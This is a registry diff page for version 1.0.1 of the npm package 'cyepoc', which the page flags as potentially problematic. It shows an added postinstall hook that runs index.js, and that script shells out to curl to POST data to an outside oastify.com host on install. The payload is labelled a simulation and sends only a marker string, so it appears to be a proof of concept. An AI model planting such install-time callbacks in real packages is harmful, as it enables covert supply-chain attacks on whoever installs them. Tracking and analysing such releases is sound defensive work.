cyepoc 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of cyepoc might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +12 -0
  2. package/package.json +13 -0
package/index.js ADDED
@@ -0,0 +1,12 @@
1
+ const { exec } = require('child_process');
2
+
3
+ // Simulate a malicious payload
4
+ exec('curl -X POST https://eygjkq4hqx3qsomqh0digxrqehk88zwo.oastify.com --data "malicious=true"', (error, stdout, stderr) => {
5
+ if (error) {
6
+ console.error(`Error executing malicious payload: ${error}`);
7
+ return;
8
+ }
9
+ console.log(`Malicious payload executed: ${stdout}`);
10
+ });
11
+
12
+ module.exports = 'This is the malicious version of cyepoc';
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "cyepoc",
3
+ "version": "1.0.1",
4
+ "description": "Malicious version of cyepoc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js"
8
+ },
9
+ "keywords": [],
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
13
+